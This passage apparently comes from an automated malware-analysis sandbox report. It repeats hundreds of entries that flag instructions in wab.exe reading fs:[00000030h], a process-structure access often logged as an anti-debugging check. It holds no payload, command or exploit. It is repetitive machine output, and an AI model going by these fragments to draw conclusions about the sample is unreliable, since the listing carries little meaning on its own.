            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_2203903E mov eax, dword ptr fs:[00000030h]25_2_2203903E
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FA33A0 mov eax, dword ptr fs:[00000030h]25_2_21FA33A0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FA33A0 mov eax, dword ptr fs:[00000030h]25_2_21FA33A0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F933A5 mov eax, dword ptr fs:[00000030h]25_2_21F933A5
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F68397 mov eax, dword ptr fs:[00000030h]25_2_21F68397
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F68397 mov eax, dword ptr fs:[00000030h]25_2_21F68397
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F68397 mov eax, dword ptr fs:[00000030h]25_2_21F68397
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_22045060 mov eax, dword ptr fs:[00000030h]25_2_22045060
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FC739A mov eax, dword ptr fs:[00000030h]25_2_21FC739A
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FC739A mov eax, dword ptr fs:[00000030h]25_2_21FC739A
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F9438F mov eax, dword ptr fs:[00000030h]25_2_21F9438F
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F9438F mov eax, dword ptr fs:[00000030h]25_2_21F9438F
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F6E388 mov eax, dword ptr fs:[00000030h]25_2_21F6E388
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F6E388 mov eax, dword ptr fs:[00000030h]25_2_21F6E388
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F6E388 mov eax, dword ptr fs:[00000030h]25_2_21F6E388
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F77370 mov eax, dword ptr fs:[00000030h]25_2_21F77370
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F77370 mov eax, dword ptr fs:[00000030h]25_2_21F77370
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F77370 mov eax, dword ptr fs:[00000030h]25_2_21F77370
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FF035C mov eax, dword ptr fs:[00000030h]25_2_21FF035C
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FF035C mov eax, dword ptr fs:[00000030h]25_2_21FF035C
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FF035C mov eax, dword ptr fs:[00000030h]25_2_21FF035C
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FF035C mov ecx, dword ptr fs:[00000030h]25_2_21FF035C
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FF035C mov eax, dword ptr fs:[00000030h]25_2_21FF035C
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FF035C mov eax, dword ptr fs:[00000030h]25_2_21FF035C
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F69353 mov eax, dword ptr fs:[00000030h]25_2_21F69353
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F69353 mov eax, dword ptr fs:[00000030h]25_2_21F69353
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FF2349 mov eax, dword ptr fs:[00000030h]25_2_21FF2349
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FF2349 mov eax, dword ptr fs:[00000030h]25_2_21FF2349
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FF2349 mov eax, dword ptr fs:[00000030h]25_2_21FF2349
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FF2349 mov eax, dword ptr fs:[00000030h]25_2_21FF2349
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FF2349 mov eax, dword ptr fs:[00000030h]25_2_21FF2349
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FF2349 mov eax, dword ptr fs:[00000030h]25_2_21FF2349
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FF2349 mov eax, dword ptr fs:[00000030h]25_2_21FF2349
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FF2349 mov eax, dword ptr fs:[00000030h]25_2_21FF2349
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FF2349 mov eax, dword ptr fs:[00000030h]25_2_21FF2349
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FF2349 mov eax, dword ptr fs:[00000030h]25_2_21FF2349
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FF2349 mov eax, dword ptr fs:[00000030h]25_2_21FF2349
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FF2349 mov eax, dword ptr fs:[00000030h]25_2_21FF2349
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FF2349 mov eax, dword ptr fs:[00000030h]25_2_21FF2349
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FF2349 mov eax, dword ptr fs:[00000030h]25_2_21FF2349
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FF2349 mov eax, dword ptr fs:[00000030h]25_2_21FF2349
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_220360B8 mov eax, dword ptr fs:[00000030h]25_2_220360B8
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_220360B8 mov ecx, dword ptr fs:[00000030h]25_2_220360B8
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F67330 mov eax, dword ptr fs:[00000030h]25_2_21F67330
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F9F32A mov eax, dword ptr fs:[00000030h]25_2_21F9F32A
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_220450D9 mov eax, dword ptr fs:[00000030h]25_2_220450D9
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F6C310 mov ecx, dword ptr fs:[00000030h]25_2_21F6C310
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F90310 mov ecx, dword ptr fs:[00000030h]25_2_21F90310
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FAA30B mov eax, dword ptr fs:[00000030h]25_2_21FAA30B
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FAA30B mov eax, dword ptr fs:[00000030h]25_2_21FAA30B
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FAA30B mov eax, dword ptr fs:[00000030h]25_2_21FAA30B
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FF930B mov eax, dword ptr fs:[00000030h]25_2_21FF930B
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FF930B mov eax, dword ptr fs:[00000030h]25_2_21FF930B
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FF930B mov eax, dword ptr fs:[00000030h]25_2_21FF930B
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F692FF mov eax, dword ptr fs:[00000030h]25_2_21F692FF
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_22030115 mov eax, dword ptr fs:[00000030h]25_2_22030115
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_2201A118 mov ecx, dword ptr fs:[00000030h]25_2_2201A118
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_2201A118 mov eax, dword ptr fs:[00000030h]25_2_2201A118
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_2201A118 mov eax, dword ptr fs:[00000030h]25_2_2201A118
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_2201A118 mov eax, dword ptr fs:[00000030h]25_2_2201A118
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F802E1 mov eax, dword ptr fs:[00000030h]25_2_21F802E1
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F802E1 mov eax, dword ptr fs:[00000030h]25_2_21F802E1
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F802E1 mov eax, dword ptr fs:[00000030h]25_2_21F802E1
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F6B2D3 mov eax, dword ptr fs:[00000030h]25_2_21F6B2D3
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F6B2D3 mov eax, dword ptr fs:[00000030h]25_2_21F6B2D3
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F6B2D3 mov eax, dword ptr fs:[00000030h]25_2_21F6B2D3
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F792C5 mov eax, dword ptr fs:[00000030h]25_2_21F792C5
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F792C5 mov eax, dword ptr fs:[00000030h]25_2_21F792C5
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F7A2C3 mov eax, dword ptr fs:[00000030h]25_2_21F7A2C3
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F7A2C3 mov eax, dword ptr fs:[00000030h]25_2_21F7A2C3
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F7A2C3 mov eax, dword ptr fs:[00000030h]25_2_21F7A2C3
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F7A2C3 mov eax, dword ptr fs:[00000030h]25_2_21F7A2C3
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F7A2C3 mov eax, dword ptr fs:[00000030h]25_2_21F7A2C3
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F9B2C0 mov eax, dword ptr fs:[00000030h]25_2_21F9B2C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F9B2C0 mov eax, dword ptr fs:[00000030h]25_2_21F9B2C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F9B2C0 mov eax, dword ptr fs:[00000030h]25_2_21F9B2C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F9B2C0 mov eax, dword ptr fs:[00000030h]25_2_21F9B2C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F9B2C0 mov eax, dword ptr fs:[00000030h]25_2_21F9B2C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F9B2C0 mov eax, dword ptr fs:[00000030h]25_2_21F9B2C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F9B2C0 mov eax, dword ptr fs:[00000030h]25_2_21F9B2C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FF92BC mov eax, dword ptr fs:[00000030h]25_2_21FF92BC
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FF92BC mov eax, dword ptr fs:[00000030h]25_2_21FF92BC
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FF92BC mov ecx, dword ptr fs:[00000030h]25_2_21FF92BC
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FF92BC mov ecx, dword ptr fs:[00000030h]25_2_21FF92BC
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_22045152 mov eax, dword ptr fs:[00000030h]25_2_22045152
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F802A0 mov eax, dword ptr fs:[00000030h]25_2_21F802A0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F802A0 mov eax, dword ptr fs:[00000030h]25_2_21F802A0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FA329E mov eax, dword ptr fs:[00000030h]25_2_21FA329E
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FA329E mov eax, dword ptr fs:[00000030h]25_2_21FA329E
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_22009179 mov eax, dword ptr fs:[00000030h]25_2_22009179
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FF0283 mov eax, dword ptr fs:[00000030h]25_2_21FF0283
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FF0283 mov eax, dword ptr fs:[00000030h]25_2_21FF0283
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FF0283 mov eax, dword ptr fs:[00000030h]25_2_21FF0283
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_2202C188 mov eax, dword ptr fs:[00000030h]25_2_2202C188
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_2202C188 mov eax, dword ptr fs:[00000030h]25_2_2202C188
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FB1270 mov eax, dword ptr fs:[00000030h]25_2_21FB1270
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FB1270 mov eax, dword ptr fs:[00000030h]25_2_21FB1270
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F99274 mov eax, dword ptr fs:[00000030h]25_2_21F99274
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F74260 mov eax, dword ptr fs:[00000030h]25_2_21F74260
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F74260 mov eax, dword ptr fs:[00000030h]25_2_21F74260
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F74260 mov eax, dword ptr fs:[00000030h]25_2_21F74260
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F6826B mov eax, dword ptr fs:[00000030h]25_2_21F6826B
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_220211A4 mov eax, dword ptr fs:[00000030h]25_2_220211A4
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_220211A4 mov eax, dword ptr fs:[00000030h]25_2_220211A4
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_220211A4 mov eax, dword ptr fs:[00000030h]25_2_220211A4
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_220211A4 mov eax, dword ptr fs:[00000030h]25_2_220211A4
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F6A250 mov eax, dword ptr fs:[00000030h]25_2_21F6A250
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F76259 mov eax, dword ptr fs:[00000030h]25_2_21F76259
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F69240 mov eax, dword ptr fs:[00000030h]25_2_21F69240
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F69240 mov eax, dword ptr fs:[00000030h]25_2_21F69240
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FA724D mov eax, dword ptr fs:[00000030h]25_2_21FA724D
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_220361C3 mov eax, dword ptr fs:[00000030h]25_2_220361C3
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_220361C3 mov eax, dword ptr fs:[00000030h]25_2_220361C3
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F6823B mov eax, dword ptr fs:[00000030h]25_2_21F6823B
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_220451CB mov eax, dword ptr fs:[00000030h]25_2_220451CB
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_220461E5 mov eax, dword ptr fs:[00000030h]25_2_220461E5
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FA7208 mov eax, dword ptr fs:[00000030h]25_2_21FA7208
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FA7208 mov eax, dword ptr fs:[00000030h]25_2_21FA7208
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FAC5ED mov eax, dword ptr fs:[00000030h]25_2_21FAC5ED
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FAC5ED mov eax, dword ptr fs:[00000030h]25_2_21FAC5ED
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F725E0 mov eax, dword ptr fs:[00000030h]25_2_21F725E0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F995DA mov eax, dword ptr fs:[00000030h]25_2_21F995DA
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F765D0 mov eax, dword ptr fs:[00000030h]25_2_21F765D0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FAA5D0 mov eax, dword ptr fs:[00000030h]25_2_21FAA5D0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FAA5D0 mov eax, dword ptr fs:[00000030h]25_2_21FAA5D0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_22045636 mov eax, dword ptr fs:[00000030h]25_2_22045636
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FAE5CF mov eax, dword ptr fs:[00000030h]25_2_21FAE5CF
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FAE5CF mov eax, dword ptr fs:[00000030h]25_2_21FAE5CF
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FA55C0 mov eax, dword ptr fs:[00000030h]25_2_21FA55C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F945B1 mov eax, dword ptr fs:[00000030h]25_2_21F945B1
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F945B1 mov eax, dword ptr fs:[00000030h]25_2_21F945B1
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F915A9 mov eax, dword ptr fs:[00000030h]25_2_21F915A9
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F915A9 mov eax, dword ptr fs:[00000030h]25_2_21F915A9
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F915A9 mov eax, dword ptr fs:[00000030h]25_2_21F915A9
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F915A9 mov eax, dword ptr fs:[00000030h]25_2_21F915A9
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F915A9 mov eax, dword ptr fs:[00000030h]25_2_21F915A9
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FF05A7 mov eax, dword ptr fs:[00000030h]25_2_21FF05A7
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FF05A7 mov eax, dword ptr fs:[00000030h]25_2_21FF05A7
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FF05A7 mov eax, dword ptr fs:[00000030h]25_2_21FF05A7
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FAE59C mov eax, dword ptr fs:[00000030h]25_2_21FAE59C
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FA4588 mov eax, dword ptr fs:[00000030h]25_2_21FA4588
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F72582 mov eax, dword ptr fs:[00000030h]25_2_21F72582
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F72582 mov ecx, dword ptr fs:[00000030h]25_2_21F72582
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F6758F mov eax, dword ptr fs:[00000030h]25_2_21F6758F
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F6758F mov eax, dword ptr fs:[00000030h]25_2_21F6758F
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F6758F mov eax, dword ptr fs:[00000030h]25_2_21F6758F
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FAB570 mov eax, dword ptr fs:[00000030h]25_2_21FAB570
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FAB570 mov eax, dword ptr fs:[00000030h]25_2_21FAB570
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FA656A mov eax, dword ptr fs:[00000030h]25_2_21FA656A
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FA656A mov eax, dword ptr fs:[00000030h]25_2_21FA656A
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FA656A mov eax, dword ptr fs:[00000030h]25_2_21FA656A
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F6B562 mov eax, dword ptr fs:[00000030h]25_2_21F6B562
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F78550 mov eax, dword ptr fs:[00000030h]25_2_21F78550
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F78550 mov eax, dword ptr fs:[00000030h]25_2_21F78550
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F7D534 mov eax, dword ptr fs:[00000030h]25_2_21F7D534
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F7D534 mov eax, dword ptr fs:[00000030h]25_2_21F7D534
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F7D534 mov eax, dword ptr fs:[00000030h]25_2_21F7D534
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F7D534 mov eax, dword ptr fs:[00000030h]25_2_21F7D534
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F7D534 mov eax, dword ptr fs:[00000030h]25_2_21F7D534
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F7D534 mov eax, dword ptr fs:[00000030h]25_2_21F7D534
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_2202F6C7 mov eax, dword ptr fs:[00000030h]25_2_2202F6C7
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F9E53E mov eax, dword ptr fs:[00000030h]25_2_21F9E53E
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F9E53E mov eax, dword ptr fs:[00000030h]25_2_21F9E53E
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F9E53E mov eax, dword ptr fs:[00000030h]25_2_21F9E53E
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F9E53E mov eax, dword ptr fs:[00000030h]25_2_21F9E53E
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F9E53E mov eax, dword ptr fs:[00000030h]25_2_21F9E53E
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FAD530 mov eax, dword ptr fs:[00000030h]25_2_21FAD530
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FAD530 mov eax, dword ptr fs:[00000030h]25_2_21FAD530
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F80535 mov eax, dword ptr fs:[00000030h]25_2_21F80535
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F80535 mov eax, dword ptr fs:[00000030h]25_2_21F80535
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F80535 mov eax, dword ptr fs:[00000030h]25_2_21F80535
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F80535 mov eax, dword ptr fs:[00000030h]25_2_21F80535
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F80535 mov eax, dword ptr fs:[00000030h]25_2_21F80535
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F80535 mov eax, dword ptr fs:[00000030h]25_2_21F80535
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_220316CC mov eax, dword ptr fs:[00000030h]25_2_220316CC
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_220316CC mov eax, dword ptr fs:[00000030h]25_2_220316CC
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_220316CC mov eax, dword ptr fs:[00000030h]25_2_220316CC
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_220316CC mov eax, dword ptr fs:[00000030h]25_2_220316CC
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_2202D6F0 mov eax, dword ptr fs:[00000030h]25_2_2202D6F0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FA7505 mov eax, dword ptr fs:[00000030h]25_2_21FA7505
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FA7505 mov ecx, dword ptr fs:[00000030h]25_2_21FA7505
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F704E5 mov ecx, dword ptr fs:[00000030h]25_2_21F704E5
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_2202F72E mov eax, dword ptr fs:[00000030h]25_2_2202F72E
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_2204B73C mov eax, dword ptr fs:[00000030h]25_2_2204B73C
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_2204B73C mov eax, dword ptr fs:[00000030h]25_2_2204B73C
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_2204B73C mov eax, dword ptr fs:[00000030h]25_2_2204B73C
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_2204B73C mov eax, dword ptr fs:[00000030h]25_2_2204B73C
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FA34B0 mov eax, dword ptr fs:[00000030h]25_2_21FA34B0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FA44B0 mov ecx, dword ptr fs:[00000030h]25_2_21FA44B0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_22043749 mov eax, dword ptr fs:[00000030h]25_2_22043749
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F764AB mov eax, dword ptr fs:[00000030h]25_2_21F764AB
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F79486 mov eax, dword ptr fs:[00000030h]25_2_21F79486
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F79486 mov eax, dword ptr fs:[00000030h]25_2_21F79486
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F6B480 mov eax, dword ptr fs:[00000030h]25_2_21F6B480
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_2202F78A mov eax, dword ptr fs:[00000030h]25_2_2202F78A
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F9A470 mov eax, dword ptr fs:[00000030h]25_2_21F9A470
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F9A470 mov eax, dword ptr fs:[00000030h]25_2_21F9A470
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F9A470 mov eax, dword ptr fs:[00000030h]25_2_21F9A470
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F71460 mov eax, dword ptr fs:[00000030h]25_2_21F71460
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F71460 mov eax, dword ptr fs:[00000030h]25_2_21F71460
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F71460 mov eax, dword ptr fs:[00000030h]25_2_21F71460
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F71460 mov eax, dword ptr fs:[00000030h]25_2_21F71460
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F71460 mov eax, dword ptr fs:[00000030h]25_2_21F71460
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F9245A mov eax, dword ptr fs:[00000030h]25_2_21F9245A
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F6645D mov eax, dword ptr fs:[00000030h]25_2_21F6645D
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_220437B6 mov eax, dword ptr fs:[00000030h]25_2_220437B6
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F7B440 mov eax, dword ptr fs:[00000030h]25_2_21F7B440
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F7B440 mov eax, dword ptr fs:[00000030h]25_2_21F7B440
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F7B440 mov eax, dword ptr fs:[00000030h]25_2_21F7B440
